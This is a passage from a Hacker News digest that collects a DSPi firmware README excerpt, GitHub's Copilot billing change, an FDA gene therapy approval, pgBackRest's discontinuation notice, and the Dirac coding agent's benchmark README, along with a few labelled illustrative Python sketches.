**Option B: Build for RP2350 (Pico 2)**

```
mkdir build-rp2350
cd build-rp2350
cmake -DPICO_BOARD=pico2 -DPICO_EXTRAS_PATH=../firmware/pico-extras ../firmware
make
```

*Output:* `DSPi/DSPi.uf2`

### 4. Flash the Device

1. Hold the **BOOTSEL** button on your board while plugging it in.
2. Drag and drop the generated `.uf2` file onto the `RPI-RP2` (or `RP2350`) drive.

Alternatively, an already-running DSPi can be put into bootloader mode without a button press by sending `REQ_ENTER_BOOTLOADER` (0xF0). The DSPi Console application uses this for one-click firmware updates. See [`Documentation/Features/firmware_update.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/firmware_update.md) for the protocol details.

* * *

## Detailed Specifications

In-depth specs for each subsystem are kept under [`Documentation/Features/`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features). These are the authoritative source for protocol formats, wire layouts, edge cases, and host-app integration patterns.

| Feature | Spec |
| --- | --- |
| Matrix Mixer | [`matrixmixer_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/matrixmixer_spec.md) |
| User Presets | [`user_presets_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/user_presets_spec.md) |
| Master Volume | [`master_volume_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/master_volume_spec.md) |
| Per-Channel Preamp | [`per_channel_preamp_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/per_channel_preamp_spec.md) |
| Volume Leveller | [`volume_leveller_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/volume_leveller_spec.md) |
| I2S Output | [`i2s_output_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/i2s_output_spec.md) |
| Peak / Clip Metering | [`peak_clip_metering_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/peak_clip_metering_spec.md) |
| Buffer Statistics | [`buffer_statistics_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/buffer_statistics_spec.md) |
| S/PDIF DMA Starvation | [`spdif_starvation_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/spdif_starvation_spec.md) |
| USB Error Diagnostics | [`usb_errors_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/usb_errors_spec.md) |
| Core 1 Modes | [`core1_modes_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/core1_modes_spec.md) |
| Device Identification | [`device_identification_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/device_identification_spec.md) |
| S/PDIF Input (planned) | [`SPDIF_input_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/SPDIF_input_spec.md) |
| Firmware Update via USB | [`firmware_update.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/firmware_update.md) |
| Roadmap | [`roadmap.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/roadmap.md) |

* * *

## License

This project is licensed under the GNU General Public License v3.0. See [LICENSE](https://github.com/WeebLabs/DSPi/blob/main/LICENSE) for details.

---

## [HN-TITLE] 24. GitHub Copilot is moving to usage-based billing

- **Source**: [https://github.blog/news-insights/company-news/github-copilot-is-moving-to-usage-based-billing/](https://github.blog/news-insights/company-news/github-copilot-is-moving-to-usage-based-billing/)
- **Site**: The GitHub Blog
- **Author**: Mario Rodriguez
- **Published**: 2026-04-27
- **HN activity**: 574 points · [428 comments](https://news.ycombinator.com/item?id=47923357)
- **Length**: 983 words (~5 min read)
- **Language**: en-US

***TL;DR:** Today, we are announcing that all GitHub Copilot plans will transition to usage-based billing on **June 1, 2026**.*

Instead of counting premium requests, every Copilot plan will include a monthly allotment of **GitHub AI Credits**, with the option for paid plans to purchase additional usage. Usage will be calculated based on token consumption, including input, output, and cached tokens, using the listed API rates for each model.

This change aligns Copilot pricing with actual usage and is an important step toward a sustainable, reliable Copilot business and experience for all users.

To help customers prepare, we are also launching a **preview bill** experience in early May, giving users and admins visibility into projected costs before the June 1 transition. This will be available to users via their Billing Overview page when they log in to github.com.

## Why we’re making this change

Copilot is not the same product it was a year ago.

It has evolved from an in-editor assistant into an agentic platform capable of running long, multi-step coding sessions, using the latest models, and iterating across entire repositories. Agentic usage is becoming the default, and it brings significantly higher compute and inference demands.

Today, a quick chat question and a multi-hour autonomous coding session can cost the user the same amount. GitHub has absorbed much of the escalating inference cost behind that usage, but the current premium request model is no longer sustainable.

Usage-based billing fixes that. It better aligns pricing with actual usage, helps us maintain long-term service reliability, and reduces the need to gate heavy users.

## What’s changing

Starting **June 1**, premium request units (PRUs) will be replaced by **GitHub AI Credits**.

Credits will be consumed based on token usage, including input, output, and cached tokens, according to the published API rates for each model.

A few important details:

- **Base plan pricing is not changing.** Copilot Pro remains $10/month, Pro+ remains $39/month, Business remains $19/user/month, and Enterprise remains $39/user/month.
- **Code completions and Next Edit suggestions remain included** in all plans and do not consume AI Credits.
- **Fallback experiences will no longer be available.** Today, users who exhaust PRUs may fall back to a lower-cost model and continue working. Under the new model, usage will instead be governed by available credits and admin budget controls.
- **Copilot code review will also consume GitHub Actions minutes**, in addition to GitHub AI Credits. These minutes are billed at the same per-minute rates as other GitHub Actions workflows.
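As a rough sketch of the token-to-credit arithmetic described above (the per-million-token rates below are hypothetical placeholders, not GitHub's published prices; real billing uses the listed API rates per model):

```python
# Hypothetical sketch of AI Credit consumption from token counts.
# The rates below are made-up placeholders, NOT GitHub's actual prices.
RATES_PER_MTOK = {  # dollars per million tokens
    "input": 0.50,
    "cached": 0.05,
    "output": 1.50,
}

def credits_used(input_tokens: int, cached_tokens: int, output_tokens: int) -> float:
    """Return the dollar-denominated AI Credits a request would consume."""
    usage = {"input": input_tokens, "cached": cached_tokens, "output": output_tokens}
    return sum(RATES_PER_MTOK[kind] * n / 1_000_000 for kind, n in usage.items())

# A long agentic session consumes far more than a quick chat question,
# which is the asymmetry the new billing model is meant to capture.
quick_chat = credits_used(2_000, 0, 500)
agent_session = credits_used(400_000, 2_000_000, 150_000)
print(f"${quick_chat:.5f} vs ${agent_session:.2f}")
```

Under these placeholder rates, a short chat costs a fraction of a cent while a multi-hour agent session with heavy cache traffic costs tens of cents, which is the disparity flat per-request pricing hid.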

Last week, [we also rolled out temporary changes](https://github.blog/news-insights/company-news/changes-to-github-copilot-individual-plans/) to Copilot Individual plans, including Free, Pro, Pro+, and Student, and paused self-serve Copilot Business plan purchases. These were reliability and performance measures as we prepare for the broader transition to usage-based billing. We will loosen usage limits once usage-based billing is in effect.

## What this means for individuals

Copilot Pro and Pro+ monthly subscriptions will include monthly AI Credits aligned to their current subscription prices:

- **Copilot Pro:** $10/month, including $10 in monthly AI Credits
- **Copilot Pro+:** $39/month, including $39 in monthly AI Credits

Users on a monthly Pro or Pro+ plan will automatically migrate to usage-based billing on June 1, 2026.

Users on annual Pro or Pro+ plans will remain on their existing plan with premium request-based pricing until their plan expires. [Model multipliers will increase on June 1 (see table)](https://docs.github.com/copilot/reference/copilot-billing/models-and-pricing#model-multipliers-for-annual-copilot-pro-and-copilot-pro-subscribers) for annual plan subscribers *only*. At expiration, they will transition to Copilot Free with the option to upgrade to a paid monthly plan. Alternatively, they may convert to a monthly paid plan before their annual plan expires, and we will provide prorated credits for the remaining value of their annual plan.

## What this means for businesses and enterprises

Copilot Business and Copilot Enterprise monthly seat pricing remains unchanged:

- **Copilot Business:** $19/user/month, including $19 in monthly AI Credits
- **Copilot Enterprise:** $39/user/month, including $39 in monthly AI Credits

To support the transition, existing Copilot Business and Copilot Enterprise customers will automatically receive promotional included usage for June, July, and August:

- **Copilot Business**: $30 in monthly AI Credits
- **Copilot Enterprise**: $70 in monthly AI Credits

We are also introducing pooled included usage across a business, which helps eliminate stranded capacity. Instead of each user’s unused included usage being isolated, credits can be pooled across the organization.

Admins will also have new budget controls. They will be able to set budgets at the enterprise, cost center, and user levels. When the included pool is exhausted, organizations can choose whether to allow additional usage at published rates or cap spend.
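A minimal sketch of how a pooled credit balance with an admin overage cap might behave (the class, its names, and its semantics are my assumptions for illustration, not GitHub's implementation):

```python
# Hypothetical model of a pooled credit balance with a paid-overage cap.
# Not GitHub's implementation; it only illustrates the pooling/budget idea.
class CreditPool:
    def __init__(self, included: float, overage_cap: float):
        self.included = included        # pooled monthly AI Credits (dollars)
        self.overage_cap = overage_cap  # max paid usage beyond the pool
        self.overage = 0.0

    def charge(self, amount: float) -> bool:
        """Deduct usage; return False if the admin budget would be exceeded."""
        from_pool = min(amount, self.included)
        extra = amount - from_pool
        if self.overage + extra > self.overage_cap:
            return False  # cap reached; request is blocked
        self.included -= from_pool
        self.overage += extra
        return True

pool = CreditPool(included=19.0 * 3, overage_cap=25.0)  # 3 Business seats pooled
assert pool.charge(50.0)      # one heavy user draws down the shared pool
assert pool.charge(20.0)      # $7 from the pool, $13 as paid overage
assert not pool.charge(15.0)  # would exceed the $25 overage cap
```

The point of pooling is visible in the first charge: a single user can consume more than one seat's $19 allotment as long as the organization's combined pool covers it.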

## The bottom line

Plan prices aren’t changing. You’ll have full control over what you spend, tools to track your usage, and the option to purchase more AI Credits if and when you need them.

If you have questions, visit our documentation for [individuals](https://docs.github.com/copilot/concepts/billing/usage-based-billing-for-individuals) and for [businesses and enterprises](https://docs.github.com/copilot/concepts/billing/usage-based-billing-for-organizations-and-enterprises), and our [FAQ and related discussion](https://github.com/orgs/community/discussions/192948).

## Written by

Mario Rodriguez leads the GitHub Product team as Chief Product Officer. His core identity is being a learner and his passion is creating developer tools—so much so that he has spent the last 20 years living that mission in leadership roles across Microsoft and GitHub. Mario most recently oversaw GitHub’s AI strategy and the GitHub Copilot product line, launching and growing Copilot across thousands of organizations and millions of users. Mario spends time outside of GitHub with his wife and two daughters. He also co-chairs and founded a charter school in an effort to progress education in rural regions of the United States.

---

## [HN-TITLE] 25. FDA approves first gene therapy for treatment of genetic hearing loss

- **Source**: [https://www.fda.gov/news-events/press-announcements/fda-approves-first-ever-gene-therapy-treatment-genetic-hearing-loss-under-national-priority-voucher](https://www.fda.gov/news-events/press-announcements/fda-approves-first-ever-gene-therapy-treatment-genetic-hearing-loss-under-national-priority-voucher)
- **Site**: FDA
- **Author**: Office of the Commissioner
- **Submitted**: 2026-04-27 10:15 UTC (Hacker News)
- **HN activity**: 221 points · [82 comments](https://news.ycombinator.com/item?id=47919733)
- **Length**: 680 words (~3 min read)
- **Language**: en

FDA News Release

Groundbreaking AAV-based gene therapy offers potential treatment for patients with OTOF gene-associated severe-to-profound and profound hearing loss

For Immediate Release:

April 23, 2026

The U.S. Food and Drug Administration today approved Otarmeni (lunsotogene parvec-cwha), the first-ever dual adeno-associated virus (AAV) vector-based gene therapy. Otarmeni is indicated for the treatment of pediatric and adult patients with severe-to-profound and profound sensorineural hearing loss (any frequency >90 dB HL) associated with molecularly confirmed biallelic variants in the *OTOF* gene.

Following the publication of powerful results of hearing restoration in the New England Journal of Medicine, the FDA acted swiftly to grant a national priority voucher for an accelerated review. Today’s approval was issued 61 days after BLA filing, marking the sixth approval under [the Commissioner's National Priority Voucher (CNPV) pilot program](https://www.fda.gov/industry/commissioners-national-priority-voucher-cnpv-pilot-program "Commissioner's National Priority Voucher (CNPV) Pilot Program") and the first gene therapy product approved under the program. It is also tied for the fastest BLA approval in modern FDA history.

Prior to today’s approval, no disease-modifying treatments existed for *OTOF*-related deafness. Otarmeni is for patients with preserved outer hair cell function and no prior cochlear implant in the same ear.

“Today’s approval is a significant milestone in the treatment of genetic hearing loss,” **said FDA Commissioner Marty Makary, M.D., M.P.H.** “Through the national priority voucher pilot program, the agency is accelerating therapies for rare diseases with unmet medical needs while proving we can successfully review even the most complex submissions—such as novel dual vector gene therapies and combination products requiring coordination across multiple offices and centers—in significantly shortened timeframes.”

Genetic mutations cause about half of congenital hearing loss. Variants in the *OTOF* gene account for 2% to 8% of inherited, non-syndromic cases. Patients with two nonworking copies do not produce otoferlin, disrupting sound signal transmission. Delayed diagnosis can lead to missed treatment windows and lasting speech and language delays.

Otarmeni and its administration kit together form a one-time biologic-device combination product. It comprises a dual adeno-associated virus serotype 1 (AAV1) vector gene therapy administered surgically into the cochlea as a single dose per ear, via a syringe and catheter provided in the Administration Kit and connected to an infusion pump. Otarmeni delivers a functional copy of the *OTOF* gene to inner hair cells to restore otoferlin production and auditory signaling.

The safety and effectiveness of Otarmeni were based on results from a single, ongoing, multi-center, single-arm clinical trial (compared against the natural history of untreated hearing loss) in 24 pediatric patients aged 10 months to 16 years with *OTOF* gene-associated severe-to-profound and profound sensorineural hearing loss (any frequency >90 dB HL), with confirmatory evidence including mechanistic nonclinical data and sustained otoferlin protein expression after Otarmeni administration. Of the 20 patients who were evaluable for efficacy, 80% experienced improved hearing, which is not expected in the natural history of the disease without intervention.

Common side effects included middle ear infection, nausea, dizziness, and procedural pain. Providers should monitor for surgical complications. The therapy is not recommended for patients with anatomy that prevents safe access to the inner ear.

The application was granted orphan drug, rare pediatric disease, fast track, and regenerative medicine advanced therapy (RMAT) designations. The FDA granted accelerated approval of Otarmeni to Regeneron Pharmaceuticals, Inc. Continued approval may be contingent upon assessment of durability of hearing improvement along with verification of treatment effects on clinical measures of speech development and quality of life. 

On June 4, 2026, the FDA will host a [public meeting](https://www.fda.gov/news-events/fda-meetings-conferences-and-workshops/commissioners-national-priority-voucher-cnpv-pilot-program-public-hearing-06042026 "Commissioner’s National Priority Voucher (CNPV) Pilot Program Public Hearing - 06/04/2026") to solicit feedback about the CNPV pilot program’s eligibility criteria, the voucher selection process, sponsor's responsibilities, pre-submission requirements, FDA review procedures, the role of the CNPV review council, and program implementation. Interested parties may also submit written comments through June 29, 2026. 

* * *

**Consumer:**  
888-INFO-FDA

###

Boilerplate

The FDA, an agency within the U.S. Department of Health and Human Services, protects the public health by assuring the safety, effectiveness, and security of human and veterinary drugs, vaccines and other biological products for human use, and medical devices. The agency also is responsible for the safety and security of our nation’s food supply, cosmetics, dietary supplements, radiation-emitting electronic products, and for regulating tobacco products.

* * *

---

## [HN-TITLE] 26. Pgbackrest is no longer being maintained

- **Source**: [https://github.com/pgbackrest/pgbackrest](https://github.com/pgbackrest/pgbackrest)
- **Site**: GitHub
- **Submitter**: c0l0 (Hacker News)
- **Submitted**: 2026-04-27 10:56 UTC (Hacker News)
- **HN activity**: 397 points · [213 comments](https://news.ycombinator.com/item?id=47919997)
- **Length**: 1.4K words (~7 min read)
- **Language**: en

## NOTICE OF OBSOLESCENCE

TL;DR: pgBackRest is no longer being maintained. If you fork pgBackRest, please select a new name for your project.

After a lot of thought, I have decided to stop working on pgBackRest. I did not come to this decision lightly. pgBackRest has been my passion project for the last thirteen years, and I was fortunate to have corporate sponsorship for much of this time, but there were also many late nights and weekends as I worked to make pgBackRest the project it is today, aided by numerous contributors. Every open-source developer knows exactly what I mean and how much of your life gets devoted to a special project.

Since Crunchy Data was sold, I have been maintaining pgBackRest and looking for a position that would allow me to continue the work, but so far I have not been successful. Likewise, my efforts to secure sponsorship have also fallen far short of what I need to make the project viable.

Like everyone else, I need to make a living, and the range of pgBackRest-related roles is very limited. I can now consider a wider variety of opportunities, but those will not leave me time to work on pgBackRest, which requires a fair amount of time for maintenance, bug fixes, PR reviews, answering issues, etc. That does not even include time to write new features, which is what I really love to do. Rather than do the work poorly and/or sporadically, I think it makes more sense to have a hard stop.

I imagine at some point pgBackRest will be forked, but that will be a new project with new maintainers, and they will need to build trust the same way we did.

Again, many thanks to all the pgBackRest contributors over the years. It was a pleasure working with you!

## Introduction

pgBackRest is a reliable backup and restore solution for PostgreSQL that seamlessly scales up to the largest databases and workloads.

pgBackRest [v2.58.0](https://github.com/pgbackrest/pgbackrest/releases/tag/release/2.58.0) is the current stable release. Release notes are on the [Releases](http://www.pgbackrest.org/release.html) page.

## Features

### Parallel Backup & Restore

Compression is usually the bottleneck during backup operations, so pgBackRest solves this problem with parallel processing and more efficient compression algorithms such as lz4 and zstd.

### Local or Remote Operation

A custom protocol allows pgBackRest to back up, restore, and archive locally or remotely via TLS/SSH with minimal configuration. An interface to query PostgreSQL is also provided via the protocol layer so that remote access to PostgreSQL is never required, which enhances security.

### Multiple Repositories

Multiple repositories allow, for example, a local repository with minimal retention for fast restores and a remote repository with a longer retention for redundancy and access across the enterprise.

### Full, Differential, & Incremental Backups (at File or Block Level)

Full, differential, and incremental backups are supported. pgBackRest is not susceptible to the time resolution issues of rsync, making differential and incremental backups safe without the requirement to checksum each file. Block-level backups save space by only copying the parts of files that have changed.

### Backup Rotation & Archive Expiration

Retention policies can be set for full and differential backups to create coverage for any time frame. The WAL archive can be maintained for all backups or strictly for the most recent backups. In the latter case, WAL required to make older backups consistent will be maintained in the archive.

### Backup Integrity

Checksums are calculated for every file in the backup and rechecked during a restore or verify. After a backup finishes copying files, it waits until every WAL segment required to make the backup consistent reaches the repository.

Backups in the repository may be stored in the same format as a standard PostgreSQL cluster (including tablespaces). If compression is disabled and hard links are enabled it is possible to snapshot a backup in the repository and bring up a PostgreSQL cluster directly on the snapshot. This is advantageous for terabyte-scale databases that are time consuming to restore in the traditional way.

All operations utilize file and directory level fsync to ensure durability.

### Page Checksums

If page checksums are enabled pgBackRest will validate the checksums for every file that is copied during a backup. All page checksums are validated during a full backup and checksums in files that have changed are validated during differential and incremental backups.

Validation failures do not stop the backup process, but warnings with details of exactly which pages have failed validation are output to the console and file log.

This feature allows page-level corruption to be detected early, before backups that contain valid copies of the data have expired.

### Backup Resume

An interrupted backup can be resumed from the point where it was stopped. Files that were already copied are compared with the checksums in the manifest to ensure integrity. Since this operation can take place entirely on the repository host, it reduces load on the PostgreSQL host and saves time since checksum calculation is faster than compressing and retransmitting data.

### Streaming Compression & Checksums

Compression and checksum calculations are performed in stream while files are being copied to the repository, whether the repository is located locally or remotely.

If the repository is on a repository host, compression is performed on the PostgreSQL host and files are transmitted in a compressed format and simply stored on the repository host. When repository compression is disabled, a lower level of compression is still used for transmission to make efficient use of available bandwidth while keeping CPU cost to a minimum.
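In-stream compression and checksumming can be sketched like this: the data is checksummed and compressed in one streaming pass so it is never read twice. This is a simplified Python illustration; pgBackRest itself is written in C and also supports lz4 and zstd:

```python
# Sketch: compress and checksum a stream in a single pass.
# Simplified illustration only; not pgBackRest's actual code.
import gzip
import hashlib
import io

def copy_with_stream(src, dst, chunk_size: int = 64 * 1024) -> str:
    """Copy src to dst compressed, returning the SHA-1 of the
    *uncompressed* data, computed while streaming."""
    sha1 = hashlib.sha1()
    with gzip.GzipFile(fileobj=dst, mode="wb") as gz:
        while chunk := src.read(chunk_size):
            sha1.update(chunk)   # checksum the raw bytes...
            gz.write(chunk)      # ...while compressing in the same pass
    return sha1.hexdigest()

payload = b"WAL segment payload " * 1000
src, dst = io.BytesIO(payload), io.BytesIO()
digest = copy_with_stream(src, dst)
assert digest == hashlib.sha1(payload).hexdigest()
assert gzip.decompress(dst.getvalue()) == payload
```

Because the checksum covers the uncompressed bytes, a later restore can verify integrity regardless of which compression algorithm produced the stored copy.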

### Delta Restore

The manifest contains checksums for every file in the backup so that during a restore it is possible to use these checksums to speed processing enormously. On a delta restore any files not present in the backup are first removed and then checksums are generated for the remaining files. Files that match the backup are left in place and the rest of the files are restored as usual. Parallel processing can lead to a dramatic reduction in restore times.
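The delta-restore decision logic above can be sketched roughly as follows (a simplified, serial illustration; pgBackRest's actual implementation is in C and parallelized):

```python
# Simplified delta-restore planner: decide which files to remove,
# keep in place, or re-copy by comparing on-disk checksums against
# the backup manifest. Not pgBackRest's actual code.
import hashlib
from pathlib import Path

def plan_delta_restore(manifest: dict[str, str], data_dir: Path):
    """manifest maps relative path -> expected SHA-1 of the backed-up file."""
    remove, keep, restore = [], [], []
    on_disk = {p.relative_to(data_dir).as_posix()
               for p in data_dir.rglob("*") if p.is_file()}
    for path in sorted(on_disk - manifest.keys()):
        remove.append(path)               # not in the backup: delete first
    for path, expected in manifest.items():
        f = data_dir / path
        if f.is_file() and hashlib.sha1(f.read_bytes()).hexdigest() == expected:
            keep.append(path)             # checksum matches: leave in place
        else:
            restore.append(path)          # missing or changed: restore
    return remove, keep, restore
```

Only the files in the `restore` list are actually copied, which is why a delta restore of a mostly unchanged cluster is so much faster than a full restore.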

### Parallel, Asynchronous WAL Push & Get

Dedicated commands are included for pushing WAL to the archive and getting WAL from the archive. Both commands support parallelism to accelerate processing and run asynchronously to provide the fastest possible response time to PostgreSQL.

WAL push automatically detects WAL segments that are pushed multiple times and de-duplicates when the segment is identical, otherwise an error is raised. Asynchronous WAL push allows transfer to be offloaded to another process which compresses WAL segments in parallel for maximum throughput. This can be a critical feature for databases with extremely high write volume.

Asynchronous WAL get maintains a local queue of WAL segments that are decompressed and ready for replay. This reduces the time needed to provide WAL to PostgreSQL which maximizes replay speed. Higher-latency connections and storage (such as S3) benefit the most.

The push and get commands both ensure that the database and repository match by comparing PostgreSQL versions and system identifiers. This virtually eliminates the possibility of misconfiguring the WAL archive location.
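The duplicate-segment handling described above can be sketched as a toy model (my illustration of the behavior, not pgBackRest's code):

```python
# Toy model of WAL push de-duplication: an identical re-push of a
# segment succeeds silently, while a different payload under the same
# segment name raises, since that signals a misconfigured archive.
import hashlib

class WalArchive:
    def __init__(self):
        self._segments: dict[str, str] = {}  # name -> SHA-1 of contents

    def push(self, name: str, payload: bytes) -> None:
        digest = hashlib.sha1(payload).hexdigest()
        existing = self._segments.get(name)
        if existing is None:
            self._segments[name] = digest   # first push: store it
        elif existing == digest:
            pass                            # identical re-push: de-duplicate
        else:
            raise ValueError(f"WAL segment {name} already archived "
                             "with different contents")

archive = WalArchive()
archive.push("000000010000000000000001", b"wal bytes")
archive.push("000000010000000000000001", b"wal bytes")  # de-duped, no error
```

Idempotent re-pushes matter because PostgreSQL may retry `archive_command` after a transient failure, and the retry must not be treated as corruption.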

### Tablespace & Link Support

Tablespaces are fully supported and on restore tablespaces can be remapped to any location. It is also possible to remap all tablespaces to one location with a single command which is useful for development restores.

File and directory links are supported for any file or directory in the PostgreSQL cluster. When restoring it is possible to restore all links to their original locations, remap some or all links, or restore some or all links as normal files or directories within the cluster directory.

### S3, Azure, and GCS Compatible Object Store Support

pgBackRest repositories can be located in S3, Azure, and GCS compatible object stores to allow for virtually unlimited capacity and retention.

### Encryption

pgBackRest can encrypt the repository to secure backups wherever they are stored.

### Compatibility with ten versions of PostgreSQL

pgBackRest includes support for ten versions of PostgreSQL, the five supported versions and the last five EOL versions. This allows ample time to upgrade to a supported version.

## Getting Started

pgBackRest strives to be easy to configure and operate:

- [User guides](http://www.pgbackrest.org/user-guide-index.html) for various operating systems and PostgreSQL versions.
- [Command reference](http://www.pgbackrest.org/command.html) for command-line operations.
- [Configuration reference](http://www.pgbackrest.org/configuration.html) for creating pgBackRest configurations.

## Sponsorship

pgBackRest would not exist without sponsors. Writing new features, fixing bugs, reviewing contributions, answering questions from the community, and maintenance all take a considerable amount of time.

Current sponsors: [Supabase](https://supabase.com).

Past sponsors: [Crunchy Data](https://crunchydata.com), [Resonate](https://resonate.com).

## Recognition

[Armchair](https://thenounproject.com/icon/armchair-129971) graphic by [Alexander Skowalsky](https://thenounproject.com/sandorsz).

---

## [HN-TITLE] 27. Show HN: OSS Agent I built topped the TerminalBench on Gemini-3-flash-preview

- **Source**: [https://github.com/dirac-run/dirac](https://github.com/dirac-run/dirac)
- **Site**: GitHub
- **Submitter**: GodelNumbering (Hacker News)
- **Submitted**: 2026-04-27 12:35 UTC (Hacker News)
- **HN activity**: 309 points · [118 comments](https://news.ycombinator.com/item?id=47920787)
- **Length**: 939 words (~5 min read)
- **Language**: en

## Dirac - Accurate & Highly Token Efficient Open Source AI Agent

> **Dirac topped the [Terminal-Bench-2 leaderboard](https://huggingface.co/datasets/harborframework/terminal-bench-2-leaderboard/discussions/145) for `gemini-3-flash-preview` with a 65.2% score!**

It is a well-studied phenomenon that a model's reasoning ability degrades as its context grows. If we keep the context tightly curated, we improve both accuracy and cost while making larger changes tractable in a single task.

Dirac is an open-source coding agent built with this in mind. It reduces API costs by **64.8%** on average while producing better and faster work, using hash-anchored parallel edits, AST manipulation, and a suite of advanced optimizations. Oh, and no MCP.

Our goal: optimize for bang-for-the-buck on tooling with bare-minimum prompting, instead of going blindly minimalistic.

## 📊 Evals

Dirac is benchmarked against other leading open-source agents on complex, real-world refactoring tasks, and consistently achieves 100% accuracy at a fraction of the cost. These evals are run on public GitHub repos and should be reproducible by anyone.

> 🏆 **TerminalBench 2.0 Leaderboard**: Dirac recently topped the [Terminal-Bench-2 leaderboard](https://huggingface.co/datasets/harborframework/terminal-bench-2-leaderboard/discussions/145) with a **65.2%** score using `gemini-3-flash-preview`. This outperforms both Google's official baseline (**47.6%**) and the top closed-source agent Junie CLI (**64.3%**). This was achieved without any benchmark-specific info or any `AGENTS.md` files being inserted.

> **Note on the cost table below**: A bug was discovered in Cline, the parent repo, after running these evals ([issue #10314](https://github.com/cline/cline/issues/10314)). We have submitted a [PR #10315](https://github.com/cline/cline/pull/10315) to fix this. This bug caused the evals for Dirac and Cline to slightly underreport the numbers ($0.03 vs $0.05 per million token cache read). Although there won't be a large difference, we will update the evals soon.

All tasks for all models used `gemini-3-flash-preview` with thinking set to `high`

| Task (Repo) | Files* | Cline | Kilo | Ohmypi | Opencode | Pimono | Roo | **Dirac** |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Task1 ([transformers](https://github.com/huggingface/transformers)) | 8 | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_DynamicCache) \[$0.37] | 🔴 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_DynamicCache_FAILURE) \[N/A] | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_DynamicCache) \[$0.24] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_DynamicCache) \[$0.20] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_DynamicCache) \[$0.34] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_DynamicCache) \[$0.49] | **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_DynamicCache) \[$0.13]** |
| Task2 ([vscode](https://github.com/microsoft/vscode)) | 21 | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_IOverlayWidget) \[$0.67] | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_IOverlayWidget) \[$0.78] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_IOverlayWidget) \[$0.63] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_IOverlayWidget) \[$0.40] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_IOverlayWidget) \[$0.48] | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_IOverlayWidget) \[$0.58] | **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_IOverlayWidget) \[$0.23]** |
| Task3 ([vscode](https://github.com/microsoft/vscode)) | 12 | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_addLogging) \[$0.42] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_addLogging) \[$0.70] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_addLogging) \[$0.64] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_addLogging) \[$0.32] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_addLogging) \[$0.25] | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_addLogging) \[$0.45] | **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_addLogging) \[$0.16]** |
| Task4 ([django](https://github.com/django/django)) | 14 | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_datadict) \[$0.36] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_datadict) \[$0.42] | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_datadict) \[$0.32] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_datadict) \[$0.24] | 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_datadict) \[$0.24] | 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_datadict) \[$0.17] | **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_datadict) \[$0.08]** |
